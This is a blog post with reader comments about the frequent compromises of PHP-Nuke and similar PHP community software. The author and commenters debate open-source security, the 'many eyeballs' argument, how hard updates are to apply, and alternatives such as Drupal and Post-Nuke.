Of course, he's right. I've been on Bugtraq long enough to realize
that the popular PHP-based boards and community systems seem to get
compromised in some way or another (SQL injection, cross-site
scripting, etc.) on a very regular basis. That's part of the reason I
asked in the first place. I was hoping someone who knows more about
the scene would enlighten me. And, despite that fact that I omitted
security from my original list of requirements, it worked
nicely.

Then, yesterday, I was looking at the MythTV project, which is an
impressive Linux PVR solution (think "Open Tivo"). Literally as I
was browsing the site someone compromised it. See the screenshot
at the right? I took that just in case it was fixed before I had a
chance to right this. Indeed, a couple hours later the site was back
to normal.

Witnessing this real-time "hacking" is a sobering example of how
far things have to come. If you've been brainwashed by Eric Raymond's
"all bugs are shallow" logic, ask yourself why we keep seeing this
sort of thing happen with popular Open Source Software such as
PHP-Nuke.

These systems need to be made so that they can be patched more easily. Offering up a new tgzball is not going to cut it. "Oh hey, an update ... I'll just unpack this and ... hey, where is my config? AAAAARRRRRRRRRRRGH!"

Sure, admins need to be more clue than this...but, we all know better at this point. Even trivial Apple and Microsoft updates which with the exception of a button click, download and install themselves. In most cases...

PHPNuke is a poor example of an Open Source project. The author is a really poor coder (Nuke was a learning project), and he is loathe to accept suggestions from people. When I first started using Nuke I submitted a couple of patches which all went completely ignored.

When my site got hacked through a really stupid piece of code, I stopped using Nuke and haven't looked back since.

If you're looking for a Nuke like piece of software, there are several splinter projects such as Post-Nuke that are more open and have a Clue.

Insecure software is insecure software, no matter how you look at it -- and no matter whether it is proprietary or free.

I believe the many eyeballs paradigm has worked very well in this case since everybody knows PHP-Nuke (and actually most people's home-PHP-projects since the language doesn't help you with web site security at all) sucks badly because it has been up on Bugtraq / F.D. lots of times. Just as I hope nobody does new installations of Sendmail and friends now. (I am surprised to see very few has ditched OpenSSH/SSL given its security history.)

If there are security bugs found in a package you use and you have a nagging feeling there might be more of them, just ditch it!

I think we need to leave some room for where ESR's shallow bug thinking may be correct, or at least not entirely wrong, on this.

To wit: PN Sucks. But Drupal doesn't suck. Drupal doesn't suck because people _read the code_ in PN (painful as it was to do so) and said "we can make this much, much, much better", forked it, and proceeded to do so.

I was browsing The Devil's Dictionary (http://www.eod.com/devil/) a while back just as the site admin accidentally did a recursive rm on the website itself. He replaced the front page with the following:

nobody mentioned xoops, why? not that i am affiliated or anything but they seen to have some interest in security. Then again I cud say this is a drupal pro-mo page :P
p.s. I have nothing against any of em

on May 13, 2007 07:51 AM

Disclaimer: The opinions expressed here are mine and
mine alone. My current, past, or previous employers are not responsible for what I
write here, the comments left by others, or the photos I may share. If
you have questions, please contact
me. Also, I am not a journalist or reporter. Don't "pitch" me.

Privacy: I do not share or publish the email addresses
or IP addresses of anyone posting a comment here without consent.
However, I do reserve the right to remove comments that are spammy,
off-topic, or otherwise unsuitable based on my comment
policy. In a few cases, I may leave spammy comments but remove any
URLs they contain.